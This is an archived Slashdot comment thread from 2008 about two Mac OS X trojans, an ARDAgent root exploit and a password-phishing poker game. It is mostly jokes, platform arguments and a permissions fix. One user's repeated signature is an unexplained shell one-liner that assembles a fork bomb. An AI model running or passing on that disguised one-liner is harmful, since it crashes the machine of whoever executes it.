Two Trojans For Mac OS X

← Back to Stories (view on slashdot.org)

Posted by kdawson on Tuesday June 24, 2008 @07:31PM from the knock-knock-who's-there-trojan dept.

I Don't Believe in Imaginary Property writes "F-Secure is reporting that there are two new Mac OS X trojans. The first is just a proof-of-concept from the MacShadows people that takes advantage of the unpatched ARDAgent vulnerability to get root access when run by the user. The second relies on social engineering: it's a poker game that requests the user's password, claiming to have detected a 'corrupt preference file.' It then takes control of the computer. Now that the source of the proof-of-concept is publicly available, we can expect that future trojans won't just politely request your password."

326 comments

users by Anonymous Coward · 2008-06-24 19:35 · Score: 5, Funny

Now that the source of the proof-of-concept is publicly available, we can expect that future trojans won't just politely request your password. Are you sure? After all, we are talking about *mac* users. :P
Let the flamewars begin!
1. Re:users by Anonymous Coward · 2008-06-24 23:15 · Score: 0
  
  Will they rudely demand it?
2. Re:users by wkcole · 2008-06-25 05:27 · Score: 1
  
  Now that the source of the proof-of-concept is publicly available, we can expect that future trojans won't just politely request your password. Are you sure? After all, we are talking about *mac* users. :P
  Let the flamewars begin!
  
  The groundbreaking PoC for politely asking for authentication info was the Swen spamming worm. I've been seeing the result of Outlook Express users happily handing it their passwords for over 4 years, although the rate these days is just a trickle. People in general are a large enough set to follow Sturgeon's Law. Many will give their passwords to anyone who asks in conjunction with promising something positive.
Two Trojans For Mac OS X Users by stuntmanmike · 2008-06-24 19:40 · Score: 5, Funny

One for you, one for your partner.
1. Re:Two Trojans For Mac OS X Users by Anonymous Coward · 2008-06-24 22:18 · Score: 2, Funny
  
  And ribbed for the mac users pleasure!
  
  Seriously, OS X is a unix system, so anything that works on it will work also work on Linux. More slashdot readers should be concerned.
2. Re:Two Trojans For Mac OS X Users by mrsteveman1 · 2008-06-24 22:58 · Score: 2, Informative
  
  Thats a stretch, the APIs are completely different, as are most of the system services, the way the kernel works. In fact, most of it is different.
3. Re:Two Trojans For Mac OS X Users by Anonymous Coward · 2008-06-24 23:50 · Score: 0
  
  GNU/Linux is not Unix/Linux.
4. Re:Two Trojans For Mac OS X Users by aproposofwhat · 2008-06-24 23:53 · Score: 0, Troll
  
  I'd have thought that Spartans would be more likely to home in on Mac users, given their reported proclivities...
  
  --
  One swallow does not a fellatrix make
5. Re:Two Trojans For Mac OS X Users by somersault · 2008-06-25 01:23 · Score: 5, Insightful
  
  This exploit is done via AppleScript and the Apple Remote Desktop Agent, which should hopefully give you some kind of hint as to why this particular issue is not going to be a problem on Linux.
  OSX is certified yes, and presumably some of the basic shell commands will be exactly the same at a source level as in Linux, but in the Linux world patches are uploaded to repositories pretty quickly and users can then download updates immediately. Apple users (of which I am one) have to wait for Apple to release updates, unless they compile everything themself. I don't know if there's an equivalent of apt-get for OSX, I haven't looked..
  Then there's the fact that 99.99% (number pulled out of my ass obviously) of exploitable bugs will have already been patched in the common OS level commands by now simply because they are being used in so many different distros. Sure there is the odd high profile bug, I remember one a few weeks ago on /. about a bug in some file listing function, though I don't think it was actually a security risk as opposed to just an annoying bug.
  
  --
  which is totally what she said
6. Re:Two Trojans For Mac OS X Users by rocketPack · 2008-06-25 01:50 · Score: 1
  
  OS X is a unix system, so anything that works on it will work also work on Linux. Do you work for SCO?
7. Re:Two Trojans For Mac OS X Users by Sancho · 2008-06-25 03:04 · Score: 1
  
  However this kind of problem is well understood in the Unix world. Be very careful of your setuid binaries. I'm extremely disappointed that Apple developers let a setuid binary run arbitrary scripts. Can you imagine if Microsoft Word with its scripting abilities were run as root? (oh, wait.....)
8. Re:Two Trojans For Mac OS X Users by Phroggy · 2008-06-25 07:59 · Score: 3, Interesting
  
  This exploit is done via AppleScript and the Apple Remote Desktop Agent, which should hopefully give you some kind of hint as to why this particular issue is not going to be a problem on Linux. Dude, I could easily write a malicious Perl script that would run just fine on Linux, if I could just talk you into running it. You'd be able to see the source code, but unless you're a Perl expert, it wouldn't be at all obvious what it was doing. I wouldn't bother trying to get root access, because I don't need root access.
  I wrote this a few years ago. Can you see how it works?
  #!/usr/bin/perl
  use strict; use warnings;
  ($,,$",$_,@_)=reverse qw(164 163 165 112),",\n",split '','\ ';
  my $music='Art'; my($swing,$rock)=q s/hacker/performer/; # another creator of art... my $blues=~/^.(\w+).*#\s(\w+)/; my $jazz=substr((grep m($music)=>qx($^X$,-v))[$[],$?,scalar @_); my $pop=eval qq("\\@_");
  print $pop, $rock, $jazz, $swing; print;
  
  --
  $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
  $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
9. Re:Two Trojans For Mac OS X Users by mrsteveman1 · 2008-06-25 09:12 · Score: 1
  
  You list 6 basic *nix commands and therefor claim the platforms are identical? Are you retarded?
  Contrary to your claim, most security issues occur in parts of the system that handle data for other programs, like system libraries, services, the kernel itself. Things that are usually quite different between platforms like i pointed out before.
  An exploit targeting a windows library to handle jpeg data is worthless against a Linux machine. And as in this specific case, an Applescript is completely worthless against Linux, I'm not there's a way to run Applescripts on Linux even with significant effort, certainly it goes way beyond "click this poker game!", you'd have to manually install all sorts of stuff if its even available at all.
10. Re:Two Trojans For Mac OS X Users by somersault · 2008-06-25 11:50 · Score: 1
  
  Hmm okay I only started using perl this year so am not familiar with all the special operators but here I go :P
  Heh I was going through that piece by piece, had got to the grep bit when I happened to read something about @_ . I've no idea what would happen when the split function tries to operate on the @_ variable since split itself works with that variable? The rest of the program being disguised as just another perl hacker (just being the numbers, another and hacker being matchen in rock/blues and the perl executable name presumably coming from $^X).
  I'm pretty lost overall on the grep line too, I'm not sure how a reference would work from what I think is just a quote of 'art'. But presumably you're setting things up to run the perl executable in the eval statement. If I hadn't started looking at this so late then I'd keep looking into it but seeing as it's 12:30am and I have work tomorrow I'm off to bed. I'll leave you to leave me stewing or give me some hints, I've been looking at obscure perl operator documentation for the last hour :P
  
  --
  which is totally what she said
11. Re:Two Trojans For Mac OS X Users by Phroggy · 2008-06-25 20:13 · Score: 1
  
  You're definitely on the right track. There is no $blues, of course, and the order of operations is significant on the reverse line - in particular, EVERYTHING on that line following the "reverse" all gets reversed, which includes the result of split '',''\ ' which of course gives you two values. This all has to happen before anything can go into @_. $, is just a conveniently confusing place to put a space, but $" is a special variable that perl will use later.
  Apparently the word "scalar" is redundant here; I'll remove it from future incarnations.
  In any case, you've done quite well for only having your head stuck in documentation for an hour. But be honest, did you confirm what it was going to do by studying the code before you tried it to find out, or did you run it first so you had some idea of what to look for? If the latter, I could have infected you with something nasty.
  
  --
  $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
  $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
12. Re:Two Trojans For Mac OS X Users by somersault · 2008-06-25 21:44 · Score: 1
  
  heh no I didn't run it I was just going through it in my head while checking back and forth with online documentation, mostly perlvar. It ended up being more like an hour and 20 minutes of looking at the actual code and then I was thinking about running parts of it today (not all of it obviously if it is going to do something malicious, just want to find out what effect changing $" has on quotes in practice etc) as I was heading to sleep :P
  I'm not familiar with that use of q at all, I usually just use qq and curly braces for my quoting needs. I thought it perhaps was using the newline as the delimiter (which it could be if \n was assigned to S", though I'm not sure if reverse would also reverse a quoted string in that context, again something I'd have to try out) so blues would be a valid variable. If the quote does carry on to that line, wouldn't an error be thrown up when perl can't find $blues?
  I might have a go trying a few things at lunchtime or after work, but for now I must get back to my not-quite-so-advanced perl hacking :) Actually I just realised I must have been using perl since Feb 2007 when I started writing a web app for work to track the movements of their equipment. I for some reason though I'd only been using perl since feb this year - the time has flown by! 8|
  
  --
  which is totally what she said
13. Re:Two Trojans For Mac OS X Users by Phroggy · 2008-06-25 22:14 · Score: 1
  
  q is to qq as ' is to " if that helps.
  q'foo' qq"foo" qe`foo` qr/foo/
  These are the default quoting characters; if you omit the q, qq, qe or qr, then you can simply use 'foo', "foo", `foo` and /foo/, but if you do use q, qq, qe or qr then you can use any delimiter characters you want. A newline does NOT count; it uses the next character after the newline as the delimiter.
  Reverse in this context doesn't reverse a quoted string, it reverses a list which has seven items in it. You don't get the list until you've done the split; that's why I said order of operations is significant.
  There is no $blues.
  
  --
  $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
  $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
14. Re:Two Trojans For Mac OS X Users by somersault · 2008-06-25 22:16 · Score: 1
  
  Ah, don't mind me, q must be the same as single quotes whereas I usually use qq which does interpolation of variables (which is awesome compared to always having to concatenate as with other languages I've used over the years)
  
  --
  which is totally what she said
15. Re:Two Trojans For Mac OS X Users by somersault · 2008-06-26 00:26 · Score: 1
  
  I get most of the program but I don't understand why m()=> executes a file? The only thing I can find on m is that it's the match operator. I did run it with the perl -v string but haven't searched through the resulting string to see what substr will get out of that mess yet, and lunch is over.
  I'm also wondering if you ever actually sleep.
  
  --
  which is totally what she said
16. Re:Two Trojans For Mac OS X Users by somersault · 2008-06-26 00:41 · Score: 1
  
  Okay, so even though http://perldoc.perl.org/functions/qx.html claims that qx is just a generalised quotes operator, apparently it is actually used for system calls so that sorts out that. I'm not sure what the m($music)=> bit will do though, possibly match art within the version info? I'm using ActivePerl so the version info will be different from perl on Linux, can check up on OSX later though to see what is in there and if it's relevant.
  
  --
  which is totally what she said
17. Re:Two Trojans For Mac OS X Users by Phroggy · 2008-06-26 01:28 · Score: 1
  
  Yikes! Where I said qe there (more than once), I meant qx.
  
  --
  $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
  $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
18. Re:Two Trojans For Mac OS X Users by Phroggy · 2008-06-26 01:29 · Score: 1
  
  Look at perldoc perlop again; what is => a synonym for?
  
  --
  $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
  $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
19. Re:Two Trojans For Mac OS X Users by Phroggy · 2008-06-26 01:30 · Score: 1
  
  I've never tested this on ActivePerl; let me know if it behaves differently. Note the capitalization of "Art".
  
  --
  $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
  $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
20. Re:Two Trojans For Mac OS X Users by somersault · 2008-06-26 02:09 · Score: 1
  
  Ah - hadn't noticed quite how comprehensive that page actually was.. thanks.
  Kinda makes me wish I had a virtual machine setup just so I didn't have to be quite so cautious.
  
  --
  which is totally what she said
21. Re:Two Trojans For Mac OS X Users by somersault · 2008-06-26 02:23 · Score: 1
  
  The version info matching works fine. I did kinda suspect last night that maybe you're leading me on a wild goose chase, and now I have decided that's just what it was :P Perhaps your point is that it took me that long to find out, either that or you just wanted to laugh at me >_> . I thought perhaps it was going to take some combination of letters out of the version string and form them into a malicious command..
  
  --
  which is totally what she said
22. Re:Two Trojans For Mac OS X Users by extrasupermario · 2008-06-26 03:40 · Score: 1
  
  "I don't know if there's an equivalent of apt-get for OSX, I haven't looked..." Here is your equivalent: http://www.macports.org/
23. Re:Two Trojans For Mac OS X Users by somersault · 2008-06-26 03:47 · Score: 1
  
  Thanks :)
  
  --
  which is totally what she said
Worst. Trojan. Ever. by Anonymous Coward · 2008-06-24 19:47 · Score: 5, Funny

The second relies on social engineering: it's a poker game that requests the user's password, claiming to have detected a 'corrupt preference file.' It then takes control of the computer.
Worst. Trojan. Ever.

Hey guys, I've got a great new idea for a worm, I'm gonna start a e-mail chain letter that tells people they'll have bad 7 years bad luck if they don't forward the e-mail to 10 friends and send me their root passwords, IP address and their bank account and credit card numbers. It's sure to be a smashing success!
1. Re:Worst. Trojan. Ever. by hdparm · 2008-06-24 20:33 · Score: 1
  
  Are you trying to prove the concept, or something?
2. Re:Worst. Trojan. Ever. by Yahweh+Doesn't+Exist · 2008-06-24 23:04 · Score: 1
  
  Agreed.
  I received a 'proof of concept trojan' in Mac Mail a few days ago. It was an email telling me my university account was being updated and I should reply with my username and password to confirm it was still active.
  Fortunately I received a 'patch' shortly after in the form of another confirming my suspicions that the first one was a hoax.
  Honest question; aside from advertising for some security company and 'Macs aren't teh 100%%%%% sekure!1' flamebait, what purpose does this article serve?
3. Re:Worst. Trojan. Ever. by rwiggers · 2008-06-24 23:23 · Score: 3, Insightful
  
  Unfortunately I think it will be a huge success. People do the dumbest thing all the time. Otherwise I wouldn't see every now and then a no-news in the journal about some lottery-ticket scam and the police saying its quite common. Just in case a lottery-ticket scam isn't common in your area: Someone approaches the victim saying that has won the lottery, but for some bogus and nonsense reason can't draw the prize, so the need to exchange the ticket with the victim for a fraction of the prize...
4. Re:Worst. Trojan. Ever. by Steauengeglase · 2008-06-25 00:11 · Score: 3, Funny
  
  Just like a Mac fan. Complain that 3rd party Trojans aren't good enough for them.
5. Re:Worst. Trojan. Ever. by Lisandro · 2008-06-25 00:20 · Score: 1
  
  Worst. Trojan. Ever.
  Oh come on. That has to be the coolest trojan ever. I almost want to give it my password!
6. Re:Worst. Trojan. Ever. by MoldySpore · 2008-06-25 00:45 · Score: 0
  
  Agreed.
  
  I received a 'proof of concept trojan' in Mac Mail a few days ago.
  
  So proof of concept is when mac users send their information to Prince Kwame Greg Mensah, the son of the king of Ashanti Village, to get his Millions of "dollers"?
  
  --
  "I hope you know how very lucky you are to know me, because I am so incredibly incredible."
7. Re:Worst. Trojan. Ever. by sakasune · 2008-06-25 03:14 · Score: 1
  
  Someone approaches the victim saying that has won the lottery, but for some bogus and nonsense reason can't draw the prize, so the need to exchange the ticket with the victim for a fraction of the prize... Watching "Matchstick Men" last night, were you?
  Actually, I believe you that it's common, I just never heard of it until I saw the movie years ago.
  
  --
  "You're arguing for a universe with fewer waffles in it," I said. "I'm prepared to call that cowardice."
8. Re:Worst. Trojan. Ever. by EmperorKagato · 2008-06-25 03:38 · Score: 1
  
  You would be surprised at how many users will give you that information.
  
  Hell, they would give up anything just to see or get the nookie.
  
  --
  ----- You know you have ego issues when you register a domain in your name.
9. Re:Worst. Trojan. Ever. by analog_line · 2008-06-25 03:50 · Score: 1
  
  This one doesn't ask for a password. That's why it's dangerous. It just runs, because the original one doesn't ask for a password. It "just works". Get it through your thick skull.
10. Re:Worst. Trojan. Ever. by thePowerOfGrayskull · 2008-06-25 04:15 · Score: 1
  
  This one doesn't ask for a password. That's why it's dangerous. It just runs, because the original one doesn't ask for a password. It "just works". Get it through your thick skull.
  Ah, yes. Something completely different. Running an untrusted program on your computer could have consequences. Quick, stop the presses.
11. Re:Worst. Trojan. Ever. by Niten · 2008-06-25 05:13 · Score: 1
  
  But we've already had a first-party trojan from Apple. It was called Safari.
12. Re:Worst. Trojan. Ever. by Anonymous Coward · 2008-06-25 12:58 · Score: 0
  
  they should make a worm that continually plays mac vs pc ad's until the user agrees to cut their own head off.
13. Re:Worst. Trojan. Ever. by czbok · 2008-06-26 19:00 · Score: 0
  
  Someone will give you whatever you want, I'm pretty sure
Proof of Concept Slashdot Trojan by frictionless+man · 2008-06-24 19:48 · Score: 5, Insightful

Hi Slashdot User!

We have detected your Slashdot account preferences have been corrupted.

To fix this, please post your user id and password in response to this message, and one of our customer service operatives will fix your account and recover posting privileges as soon as possible.

Yours Sincerely, Trojan
1. Re:Proof of Concept Slashdot Trojan by i'm+lost · 2008-06-24 19:50 · Score: 3, Funny
  
  I need my preferences fixed. My password is 12345.
2. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · 2008-06-24 19:55 · Score: 0
  
  User: cowboyneal
  Password: 7of9ismydesktop
3. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · 2008-06-24 20:01 · Score: 4, Funny
  
  That sounds like a combination an idiot would have on his luggage.
4. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · 2008-06-24 20:10 · Score: 5, Funny
  
  User Id: Anonymous Coward
  Password is blank.
  I hope you fix my preferences soon, my karma never seems to go up, no matter how much I get modded up.
5. Re:Proof of Concept Slashdot Trojan by bky1701 · 2008-06-24 20:17 · Score: 1
  
  It's because you keep posting links to goatse, Anonymous!
  
  --
  Great Intellect...
6. Re:Proof of Concept Slashdot Trojan by weicco · 2008-06-24 20:22 · Score: 4, Funny
  
  1 2 3 4 5? That's amazing! I've got the same combination on my luggage!
  
  --
  You don't know what you don't know.
7. Re:Proof of Concept Slashdot Trojan by JohnBailey · 2008-06-24 20:27 · Score: 4, Funny
  
  Wow.. thanks for the heads up.. my password is "********"
  
  --
  It is difficult to get a man to understand something when his job depends on not understanding it.
8. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · 2008-06-24 20:29 · Score: 0
  
  Har har! Now I OWN your account.. so much for the infamous Anonymous Coward...
9. Re:Proof of Concept Slashdot Trojan by Hal_Porter · 2008-06-24 20:34 · Score: 5, Funny
  
  O/T but have you noticed how if you post sensitive information like your password here SlashCode filters it to X's. Very nice idea.
  
  --
  echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
10. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · 2008-06-24 20:39 · Score: 1, Informative
  
  Nah, it's his infernal UID.
11. Re:Proof of Concept Slashdot Trojan by mrbluze · 2008-06-24 20:41 · Score: 5, Funny
  
  1 2 3 4 5? That's amazing! I've got the same combination on my luggage! Is your luggage by any chance in the form of a wooden horse?
  
  --
  Do it yourself, because no one else will do it yourself. [beta blockade 10-17 Feb]
12. Re:Proof of Concept Slashdot Trojan by kestasjk · 2008-06-24 20:42 · Score: 1, Insightful
  
  And where's the comment playing down the seriousness of the first proof-of-concept? The one that uses an unpatched ARDAgent vulnerability?
  
  Some Mac users just can't face that they're not as invincible as Apple marketing wants them to think, and reject any evidence to the contrary.
  
  (I'm about to be told how this local root vulnerability isn't a real vulnerability, because it's local.)
  
  --
  // MD_Update(&m,buf,j);
13. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · 2008-06-24 20:48 · Score: 0
  
  Sucker! Now I 0wnz y00r acc0unt!
  Anonymous Coward will have a bad rep from now on!
14. Re:Proof of Concept Slashdot Trojan by fatphil · 2008-06-24 20:57 · Score: 5, Funny
  
  Obligatory: http://www.bash.org/?244321
  
  --
  Also FatPhil on SoylentNews, id 863
15. Re:Proof of Concept Slashdot Trojan by lurch_mojoff · 2008-06-24 21:18 · Score: 5, Insightful
  
  And where's the comment playing down the seriousness of the first proof-of-concept? The one that uses an unpatched ARDAgent vulnerability? Some Mac users just can't face that they're not as invincible as Apple marketing wants them to think, and reject any evidence to the contrary. (I'm about to be told how this local root vulnerability isn't a real vulnerability, because it's local.) That comment is in the thread of the previous "How to Save Mac OS X From Malware" article, as well as in the comment thread of the article originally reporting the ARD vulnerability posted last week. Yes, Arty McStrawman does believe that his Mac is invincible. Not many beside him do, though. Also, if you already know what will people respond to you, why do you ask your, fairly inflammatory, I might add, question, even if you intended it to be a rhetorical one?
16. Re:Proof of Concept Slashdot Trojan by knutkracker · 2008-06-24 21:40 · Score: 1
  
  1 2 3 4 5? That's amazing! I've got the same combination on my luggage! Shit.
  
  Now you're going to change it and I won't be able to ebay your spare socks anymore.
  
  Loss of income and loss of entertainment. That's one bad-ass trojan.
17. Re:Proof of Concept Slashdot Trojan by Daimanta · 2008-06-24 22:22 · Score: 1
  
  Well, my password is the prime factorization of my user id concatenated from small to large to one string.
  
  --
  Knowledge is power. Knowledge shared is power lost.
18. Re:Proof of Concept Slashdot Trojan by ohcrapitssteve · 2008-06-24 23:51 · Score: 2, Insightful
  
  You're about to be told that no OS is safe from it's worst users. Okay, a root vulnerability. That's bad. Why is it still asking for a password? Since it is asking (and apparently getting it from some), it doesn't even need to exploit the vulnerability. This is the real news.
  
  Local root is "business as usual" on out of the box Windows, and has been for a long time. (I'm about to be told a nag screen with a silly make-the-background-dark effect is a reasonable substitute for a real security hierarchy. )
  
  Just because Mac users are used to a safe operating experience doesn't mean we think we're invulnerable and we don't know how to protect ourselves. I'm sorry all three Mac users you know are morons...
19. Re:Proof of Concept Slashdot Trojan by laurens · 2008-06-24 23:55 · Score: 1
  
  Hey, nice primes!
20. Re:Proof of Concept Slashdot Trojan by WaroDaBeast · 2008-06-24 23:56 · Score: 1
  
  You might be surprised; I was once messing with luggage combinations -- I was still a kid, by the way -- at some supermarket. Turned out one of them was '005.'
  
  --
  "The body may heal, but the mind is not always so resilient." -- Deus Ex: Human Revolution
21. Re:Proof of Concept Slashdot Trojan by MadKeithV · 2008-06-25 00:04 · Score: 1
  
  My password is all 7's. But I'm not telling you in which order!
22. Re:Proof of Concept Slashdot Trojan by lordkuri · 2008-06-25 00:19 · Score: 0, Redundant
  
  12345!? That's amazing! I've got the same combination on my luggage!!
  (someone was going to do it, might as well be me)
23. Re:Proof of Concept Slashdot Trojan by clang_jangle · 2008-06-25 00:38 · Score: 0, Flamebait
  
  And where's the comment playing down the seriousness of the first proof-of-concept? The one that uses an unpatched ARDAgent vulnerability?
  
  All I know is (1) it doesn't run on my Mac (or a lot of other people's Macs), I tried it, and (2) the workaround is terribly easy
  
  Some Mac users just can't face that they're not as invincible as Apple marketing wants them to think, and reject any evidence to the contrary.
  
  Maybe. But some Mac haters just can't face that they're far more vulnerable than we are and reject any evidence to the contrary.
  
  --
  Caveat Utilitor
24. Re:Proof of Concept Slashdot Trojan by Hal_Porter · 2008-06-25 00:46 · Score: 2, Interesting
  
  Also, if you already know what will people respond to you, why do you ask your, fairly inflammatory, I might add, question, even if you intended it to be a rhetorical one?
  Let me tell you a story. Fresh out of university I got my first full time job. I worked in an office. Worked was actually a bit of misnomer, we were all so bored the guy next to me confessed to being so concerned about not having anything to do he typed ps -aux on his Sun occasionally to 'make shit scroll past when the boss walked past'. Someone else said 'you pop a lot of brain cells working here'.
  Everyone wore suits to work, no one did any work as far as I could tell, and no one trusted anyone else. One guy came in with a new, slimline and expensive briefcase. All my coworkers crowded around him saying how cool it was. The boss walked in and headed for the middle of the crowd. He looked at the briefcase and said it was pretty cool. Then he looked at the hinges. They were actually a bit shoddy. He said something like 'I'd be happy if I got something like that in a Christmas cracker, but in something this expensive it's a bit of a disappointment'. The guy with the briefcase looked a bit crestfallen and I think he stopped bringing it to work after a couple of weeks. Especially since the only thing he had to put in it was a sandwich for lunch, which didn't fit as the boss pointed out.
  Now do you understand?
  
  --
  echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
25. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · 2008-06-25 00:56 · Score: 0
  
  Yes, Arty McStrawman does believe that his Mac is invincible. Not many beside him do, though.
  You mean you haven't run into the hoards of Mac fanboys here who claim their Mac is invincible to malware, then used the fact that no malware existed as "proof" of their claims? Of course, you may not have heard much from them recently, as reality finally delivered a well deserved smackdown to these idiots.
26. Re:Proof of Concept Slashdot Trojan by 2sheds · 2008-06-25 01:00 · Score: 1
  
  Prepare Spaceball 1 for immediate departure!
  
  --
  
  Absit Invidia
27. Re:Proof of Concept Slashdot Trojan by Thiez · 2008-06-25 01:03 · Score: 1
  
  There isn't much you can do about that. We know most people trying to 'crack' a luggage combination will start at 000 and keep adding 1 until they find the combination. This makes 005 a bad number, and 999 the best number. However, if everyone would, for this reason, choose their combinations only in the range [100,999], it would make sense for a smart attacker to begin cracking at 100, making combinations on every bag easier to crack (since the keyspace that needs to be searched has shrunk by a factor 0.9).
  So you shouldn't be suprised.
28. Re:Proof of Concept Slashdot Trojan by stewbacca · 2008-06-25 01:09 · Score: 1
  
  My password is all 7's. But I'm not telling you in which order! Will you tell me how many though?
29. Re:Proof of Concept Slashdot Trojan by WaroDaBeast · 2008-06-25 01:11 · Score: 1
  
  Now that I think about it, I remember having seen some pieces of luggage with two combinations; this may reduce the odds of buying easily 'crackable' luggage.
  
  --
  "The body may heal, but the mind is not always so resilient." -- Deus Ex: Human Revolution
30. Re:Proof of Concept Slashdot Trojan by samkass · 2008-06-25 01:23 · Score: 2, Insightful
  
  Now that the source of the proof-of-concept is publicly available, we can expect that future trojans won't just politely request your password.
  What, is this insinuating that they're going to rudely ask for your password? Because the ARDAgent vulnerability is really easy to patch... you can easily do it yourself and I'm sure Apple will have a patch any day.
  But it still comes down to the user. While there aren't any viruses in the wild for MacOS X, there are always going to be trojans for every OS. It's a lot easier to fool the user than to fool the software. Once you've convinced the user somehow to type their password, it doesn't matter how much security you've got.
  
  --
  E pluribus unum
31. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · 2008-06-25 01:31 · Score: 0
  
  Someone change to combination to my luggage!
32. Re:Proof of Concept Slashdot Trojan by 0100010001010011 · 2008-06-25 01:50 · Score: 4, Funny
  
  <Cthon98> hey, if you type in your pw, it will show as stars <Cthon98> ********* see! <AzureDiamond> hunter2 <AzureDiamond> doesnt look like stars to me <Cthon98> <AzureDiamond> ******* <Cthon98> thats what I see <AzureDiamond> oh, really? <Cthon98> Absolutely <AzureDiamond> you can go hunter2 my hunter2-ing hunter2 <AzureDiamond> haha, does that look funny to you? <Cthon98> lol, yes. See, when YOU type hunter2, it shows to us as ******* <AzureDiamond> thats neat, I didnt know IRC did that <Cthon98> yep, no matter how many times you type hunter2, it will show to us as ******* <AzureDiamond> awesome! <AzureDiamond> wait, how do you know my pw? <Cthon98> er, I just copy pasted YOUR ******'s and it appears to YOU as hunter2 cause its your pw <AzureDiamond> oh, ok. (For those that don't want to copy and paste)
33. Re:Proof of Concept Slashdot Trojan by neomunk · 2008-06-25 01:54 · Score: 1
  
  Loss of income and loss of entertainment. That's one bad-ass trojan. Perhaps we should give it a name to honor the RIAA, with whom it shares so many lovely traits.
34. Re:Proof of Concept Slashdot Trojan by Steve+Max · 2008-06-25 01:57 · Score: 1
  
  33353359? Or 3353359? Should I count the two times that "3" appears, or only once like 353 and 359?
35. Re:Proof of Concept Slashdot Trojan by jcgf · 2008-06-25 02:04 · Score: 1
  
  Now do you understand?
  Uhh, no actually, your story did not clear anything up at all. Also, why are you responding for another user? It seemed cool, so I decided to try it myself.
36. Re:Proof of Concept Slashdot Trojan by Huggs · 2008-06-25 02:14 · Score: 1
  
  pw = iheartcowboyneal ... can you fix me now?
37. Re:Proof of Concept Slashdot Trojan by clang_jangle · 2008-06-25 02:28 · Score: 1
  
  Because the ARDAgent vulnerability is really easy to patch... you can easily do it yourself and I'm sure Apple will have a patch any day.
  
  I'm not sure a patch is warranted. The reason this "vulnerability" doesn't exist on lots of machines is that the default permissions for /System/Library/CoreServices/RemoteManagement/ARDAgent.app are drwxr-xr-x, which means there is no vulnerability. I suspect MacPorts or some other commonly installed app is actually responsible for changing the permissions on ARDAgent.app, thus creating the vulnerability for some users. The night before it was announced I had done an rsync on MacPorts, after which I noticed some bugginess. So I used the install disc to fix permissions and the bugginess went away. Just a theory, of course, but it seems sound in light of my experience. In any event, I have no plans to ever use ARDAgent, so just to be extra sure I archived it to a zip file, and now it is inaccessible.
  
  --
  Caveat Utilitor
38. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · 2008-06-25 02:53 · Score: 0
  
  The lesson is that there is always some asshole who can't wait to strut in and burst your shiny bubble.
  And yet, that asshole, by existing outside of your peer group is capable of seeing that the bubble
  is not as shiny and perfect as you all think that it is.
39. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · 2008-06-25 03:06 · Score: 0
  
  Next time, instead of checking perms on the .app package folder, try looking at the executable.
40. Re:Proof of Concept Slashdot Trojan by FishAdmin · 2008-06-25 03:07 · Score: 1
  
  I was totally behind you, right up to the point where you got possessed by William Shatner:
  Also, if you already know what will people respond to you, why do you ask your, fairly inflammatory, I might add, question, even if you intended it to be a rhetorical one?
  
  --
  Last night I played a blank tape at full volume. The mime next door went nuts.
41. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · 2008-06-25 03:07 · Score: 0
  
  With a password like that, I'd say you're broken beyond repair.
42. Re:Proof of Concept Slashdot Trojan by clang_jangle · 2008-06-25 03:22 · Score: 1
  
  Next time, instead of checking perms on the .app package folder, try looking at the executable.
  
  You fail. Next time investigate more thoroughly, helps avoid that foot-in-mouth thing. :)
  
  --
  Caveat Utilitor
43. Re:Proof of Concept Slashdot Trojan by clang_jangle · 2008-06-25 03:43 · Score: 1
  
  Whoops, it's me with foot in mouth, darn! I was thinking I couldn't change perms on the executable without also changing them on the .app or it would disable the .app, but I was mistaken, and you are correct. Of course, the fix (sudo chmod -R u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app does still cover that).
  
  Sorry about that, chief!
  
  --
  Caveat Utilitor
44. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · 2008-06-25 04:08 · Score: 0
  
  You're new here, right?
45. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · 2008-06-25 04:09 · Score: 0
  
  I know. Doesn't it rule to love the smell of your own farts?? GO MAC!!!!
46. Re:Proof of Concept Slashdot Trojan by clang_jangle · 2008-06-25 04:16 · Score: 1
  
  No, just female. We tend to own our mistakes. :)
  
  ***races off to avoid battle-of-the-sexes brawl***
  
  --
  Caveat Utilitor
47. Re:Proof of Concept Slashdot Trojan by NtroP · 2008-06-25 04:24 · Score: 1
  
  Next time, instead of checking perms on the .app package folder, try looking at the executable.
  ls -lR /System/Library/CoreServices/RemoteManagement/ARDAgent.app on my system shows that NONE of the files are SUID. Then again, I have not installed many 3rd-party apps except things like FireFox on my MacBook and I run "fix permissions" after major updates. I'm betting the parent is correct and this is a "vulnerability" that is introduced by a third-party application or framework.
  
  --
  "terrorism" and "pedophilia" are the root passwords to the Constitution
48. Re:Proof of Concept Slashdot Trojan by Koiu+Lpoi · 2008-06-25 04:37 · Score: 1
  
  People have been caught by that on the infamous 4chan's "random" board. Somebody started a topic with the text saying, more or less
  "Hey guys, watch this! If you type in a valid social security number, it wordfilters to all Xs. Watch.
  XXX-XX-XXXX"
